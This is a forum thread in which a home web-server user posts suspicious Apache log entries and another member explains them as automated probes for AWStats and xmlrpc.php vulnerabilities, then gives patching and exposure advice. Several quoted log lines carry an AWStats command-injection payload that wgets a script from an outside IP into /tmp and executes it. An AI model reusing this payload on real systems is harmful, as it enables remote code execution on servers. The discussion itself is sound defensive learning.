wierd log entries 1

[turnbui]

i use an account thru yndns.org to give userland cess o my web pages. i noticed the following log entries that have nothing to do with my web pages. is this an error on dyndns.org wrongly directing traffic to my vhosts?

218.104.71.173 - - [27/Jan/2006:00:25:45 +0000] "GET /awstats/awstats.pl?configdir=|echo;echo%20YYY;cd%20%2ftmp%3bwget%20194%2e102%2e194%2e115%2fscripz%3bchmod%20%2bx%20scripz%3b%2e%2fscripz;echo%20YYY;echo| HTTP/1.1" 404 294

218.104.71.173 - - [27/Jan/2006:00:25:46 +0000] "GET /cgi-bin/awstats.pl?configdir=|echo;echo%20YYY;cd%20%2ftmp%3bwget%20194%2e102%2e194%2e115%2fscripz%3bchmod%20%2bx%20scripz%3b%2e%2fscripz;echo%20YYY;echo| HTTP/1.1" 404 294

218.104.71.173 - - [27/Jan/2006:00:25:47 +0000] "GET /cgi-bin/awstats/awstats.pl?configdir=|echo;echo%20YYY;cd%20%2ftmp%3bwget%20194%2e102%2e194%2e115%2fscripz%3bchmod%20%2bx%20scripz%3b%2e%2fscripz;echo%20YYY;echo| HTTP/1.1" 404 302

218.104.71.173 - - [27/Jan/2006:00:25:49 +0000] "POST /xmlrpc.php HTTP/1.1" 404 286
218.104.71.173 - - [27/Jan/2006:00:25:50 +0000] "POST /blog/xmlrpc.php HTTP/1.1" 404 291
218.104.71.173 - - [27/Jan/2006:00:25:51 +0000] "POST /blog/xmlsrv/xmlrpc.php HTTP/1.1" 404 298
218.104.71.173 - - [27/Jan/2006:00:25:53 +0000] "POST /blogs/xmlsrv/xmlrpc.php HTTP/1.1" 404 299
218.104.71.173 - - [27/Jan/2006:00:25:54 +0000] "POST /drupal/xmlrpc.php HTTP/1.1" 404 293
218.104.71.173 - - [27/Jan/2006:00:25:56 +0000] "POST /phpgroupware/xmlrpc.php HTTP/1.1" 404 299
218.104.71.173 - - [27/Jan/2006:00:25:58 +0000] "POST /xmlrpc.php HTTP/1.1" 404 286
218.104.71.173 - - [27/Jan/2006:00:25:57 +0000] "POST /wordpress/xmlrpc.php HTTP/1.1" 404 296
218.104.71.173 - - [27/Jan/2006:00:26:01 +0000] "POST /xmlsrv/xmlrpc.php HTTP/1.1" 404 293
218.104.71.173 - - [27/Jan/2006:00:26:00 +0000] "POST /xmlrpc/xmlrpc.php HTTP/1.1" 404 293

64.182.1.110 - - [28/Jan/2006:11:45:07 +0000] "GET /awstats/awstats.pl?configdir=|echo;echo%20YYY;cd%20%2ftmp%3bwget%20194%2e102%2e194%2e115%2fscripz%3bchmod%20%2bx%20scripz%3b%2e%2fscripz;echo%20YYY;echo| HTTP/1.1" 404 294
64.182.1.110 - - [28/Jan/2006:11:45:08 +0000] "GET /cgi-bin/awstats.pl?configdir=|echo;echo%20YYY;cd%20%2ftmp%3bwget%20194%2e102%2e194%2e115%2fscripz%3bchmod%20%2bx%20scripz%3b%2e%2fscripz;echo%20YYY;echo| HTTP/1.1" 404 294
64.182.1.110 - - [28/Jan/2006:11:45:09 +0000] "GET /cgi-bin/awstats/awstats.pl?configdir=|echo;echo%20YYY;cd%20%2ftmp%3bwget%20194%2e102%2e194%2e115%2fscripz%3bchmod%20%2bx%20scripz%3b%2e%2fscripz;echo%20YYY;echo| HTTP/1.1" 404 302
64.182.1.110 - - [28/Jan/2006:11:45:14 +0000] "POST /blogs/xmlsrv/xmlrpc.php HTTP/1.1" 404 299

 

[smah]

These are all attempts to exploit some well known vulnerabilities. It looks like you're ok because you're server is returning 404 (not found) errors. I'm guessing that you do have awstats installed, so make sure that you keep it updated. The various cms's seem not be be installed, correct?

 

[turnbui]

No I don't think I have awstats installed. This was on a Win XP machine with Apache. "The various cms's seem not be be installed, correct?" - not sure what you mean by cms's?
Thanks for responding any further info will be soaked up like I'm a sponge though.

 

[smah]

worpress, drupal, phpgroupware, etc are all Content Management Systems. (See

http://www.opensourcecms.com/

for all of them & more). AWStats is a log analyzing utility.

All of this software is widely used & certain versions have well-known vulnerabilities that can be exploited. I see the same things in my logs, but I don't usually see all the extra parameters with the awstats reqests - that's why I suspected that you actually had awstats running.

 

[turnbui]

Thanks for explanation. Can you elaborate further on these well known "vulnerabilities" please. I'll be happy with as much or as little as you care to explain. As you can tell I'm on a learning curve here so any info will be a big help.
Thaanks

 

[smah]

Hopefully this works:
AWStats
xmlrpc

You can also find out more by visiting each project's website.

 

[turnbui]

Thanks for that.
So let me c if I understand this. Someone has sent a http: request to my IP number in the hope that I have Awstats running and this particular request shoud give them access to my machine?
Luckily I don't have Awstats installed so they are getting a 404 returned by Apache.

If above is so how did they know I had Apache installed?

As normal any help will be cool.

 

[smah]

There are numerous ways to find out what web server is running (turn off IE's friendly error messages & go to a page on your server that doesn't exist), but it doesn't really matter to the attacker. They will have a script running on some zombie macxhine that attempts all of these combinations on every IP that's listening. It's good that you're examining your logs & questioning suspicious entries.

 

[turnbui]

My My I don't know whether to be alarmed or impressed. I've heard of hacking, naturally, but to see it done to me is quite frightening. Not that I've got anything worth having on my machine but I may have.

I just thought it'd be cool to host my own web pages. Might have to rethink this.

Hang on a minute - I do my internet banking on this machine
shudder.

I think I'd like to learn a lot more on this and the various techniques employed as well as how to prevent them. Have you any places that might give up a few of these other "secrets" ?

Either way, thanks for the information.

 

[smah]

There are thousands of sites with useful security and configuration information. Good sources are always: the OS web site (in your case MS), the server sofware site (apache.org), the US CERT site (

http://www.us-cert.gov)

and any & all known good antivirus & antispyware sites, and the web site of any other software that interfaces with the publicly accessible services (like CMS, cgi scripts, etc). For example, AWStats is cgi script that runs on a web server. It analyzes the apache access & error logs and then makes pretty graph filled web pages. With a little effort configuring it, even the versions with the vulnerability can be made to only listen & answer for machines & IP addresses inside your local network. Unfortunately, many users left it open to the internet.

You seem to already be thinking about the ramifications of making a machine accessible to the entire world and that's good. Common sense is a good starting point - don't expose any more than you need to, what would happen if it were comprimized, & how would you know / what would you do?

There are many sites out there running old versions of those CMS that have been hacked & don't know it because they don't look at the logs that you've already been reviewing. Going back to the AWStats scenario - even if there were no security vulnerabilites, why would you want this info available to the internet? If you follow this line of thinking & keep up with the software patches / security updates & do all the required research, you'll be fine. Just the fact that you noticed & asked the right questions is a good start.

 

[turnbui]

Whew! What a minefield. But the start of a long journey begins with the first step - I guess. Thanks again for your invaluable info. Looks like I've got a ways to go but at least its something I have an interest in so it isn't all bad.

Cheers smah.